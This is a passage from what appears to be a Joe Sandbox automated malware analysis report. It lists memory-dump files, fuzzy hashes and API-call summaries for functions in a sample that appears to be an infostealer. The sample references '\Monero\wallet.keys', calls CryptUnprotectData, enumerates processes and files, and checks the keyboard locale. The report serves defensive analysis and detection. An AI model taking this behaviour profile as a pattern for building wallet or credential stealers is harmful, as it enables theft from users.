Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: af210d995d085fe6914e7692f46b217bce76935f81c3a7a1c62cd205ecaaee17
Instruction ID: b4a2b1cd1f7dcafeec0ff14dc2d6b8452f0491914538a5e51040902b255c16c8
Opcode Fuzzy Hash: af210d995d085fe6914e7692f46b217bce76935f81c3a7a1c62cd205ecaaee17
Instruction Fuzzy Hash: 421206719502189BDB59FB60CC96EEE7378AF74301F8081A9B546620D1EFB06F89CF91

Function 000FDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001114B0,00110C2A), ref: 000FDAEB
StrCmpCA.SHLWAPI(?,001114B4), ref: 000FDB33
StrCmpCA.SHLWAPI(?,001114B8), ref: 000FDB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 000FDDCC
FindClose.KERNEL32(000000FF), ref: 000FDDDE

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 016b480c998debb234c405c7758974db5363fc66fb2fad0f3f455db4f278fd5e
Instruction ID: e332a503210dde0f64ce26f100d54c38a8aabf438aaacbf213b5d4ec2342c147
Opcode Fuzzy Hash: 016b480c998debb234c405c7758974db5363fc66fb2fad0f3f455db4f278fd5e
Instruction Fuzzy Hash: B591677290020897CB14FBB0EC96EFD737DAFA4300F808659F94696581EF749B49CB92

Function 00107B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

GetKeyboardLayoutList.USER32(00000000,00000000,001105AF), ref: 00107BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00107BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00107C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00107C62
LocalFree.KERNEL32(00000000), ref: 00107D22

Strings

/ , xrefs: 00107C7F

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 570522c2a7d2559c49f0e3673170aa0b313232b1429a98d0c8d1d5f71246d276
Instruction ID: dc33dd58c083fca6028a5ac22cd9fa7ffc2a548a3f50715b226211591385bdb3
Opcode Fuzzy Hash: 570522c2a7d2559c49f0e3673170aa0b313232b1429a98d0c8d1d5f71246d276
Instruction Fuzzy Hash: 7C416C71940218ABDB24DB94DC99FEEB378FF58700F608199E049A61C0DBB42F85CFA1

Function 000FE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00110D73), ref: 000FE4A2
StrCmpCA.SHLWAPI(?,001114F8), ref: 000FE4F2
StrCmpCA.SHLWAPI(?,001114FC), ref: 000FE508
FindNextFileA.KERNEL32(000000FF,?), ref: 000FEBDF

Strings

\*.*, xrefs: 000FE44D

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 9af63588a5c8bd0b25b467817f5def3a38d13a4b63c0ec6a51f5917b5d65d60c
Instruction ID: 35a24392d998760f54fb6773aaf3f6d989d8b63d2dc00faea36901e65e67e50f
Opcode Fuzzy Hash: 9af63588a5c8bd0b25b467817f5def3a38d13a4b63c0ec6a51f5917b5d65d60c
Instruction Fuzzy Hash: EA1257719102189BDB58FB60DC96EED7379AF64300FC081A9B58A560D1EFB06F49CF92

Function 00109600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0010961E
Process32First.KERNEL32(00110ACA,00000128), ref: 00109632
Process32Next.KERNEL32(00110ACA,00000128), ref: 00109647
StrCmpCA.SHLWAPI(?,00000000), ref: 0010965C
CloseHandle.KERNEL32(00110ACA), ref: 0010967A

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 7eca98ee2a469766d2519aea44f82dd36c036134bb41620dba842a430e3161d8
Instruction ID: 198fd085920c3c244e206adce4307b6e71865d0a493cdc884b00559d17fabb92
Opcode Fuzzy Hash: 7eca98ee2a469766d2519aea44f82dd36c036134bb41620dba842a430e3161d8
Instruction Fuzzy Hash: 76011EB5A00208EBCB15DFA5CD98BEDBBF8FB48700F104188A985A7290EB759B40DF51

Function 00107A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00CDE280,00000000,?,00110E10,00000000,?,00000000,00000000), ref: 00107A63
RtlAllocateHeap.NTDLL(00000000), ref: 00107A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00CDE280,00000000,?,00110E10,00000000,?,00000000,00000000,?), ref: 00107A7D
wsprintfA.USER32 ref: 00107AB7

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: 58cf6955cb909254040c1bf2fab988cf739f029012d41a8bb242d759c57d6f8a
Instruction ID: 5bf7554c6a14b64a7dab1f3f96ca044982d40b3f3af9cdcb8b57fc73ab2da7f5
Opcode Fuzzy Hash: 58cf6955cb909254040c1bf2fab988cf739f029012d41a8bb242d759c57d6f8a
Instruction Fuzzy Hash: 0B118EB1E45618EBEB208B54DC49FA9BBB8FB04721F10479AE90A932C0C7741A44CF51

Function 000F9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 000F9B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 000F9BA3
LocalFree.KERNEL32(?), ref: 000F9BD3

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 132190a71acebd806083cd5ed5f5af773efa5cc8bdc3a52845ff4ea397bbbd98
Instruction ID: 14c80a46f190a604efec601cc3ee426b3dd9caae042f07bea67d6feff8547778
Opcode Fuzzy Hash: 132190a71acebd806083cd5ed5f5af773efa5cc8bdc3a52845ff4ea397bbbd98
Instruction Fuzzy Hash: E611CCB4A00209DFDB05DF94D985AAE77F9FF88300F104558E915A7350D774AE10CF61

Function 00107850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000F11B7), ref: 00107880
RtlAllocateHeap.NTDLL(00000000), ref: 00107887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0010789F

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

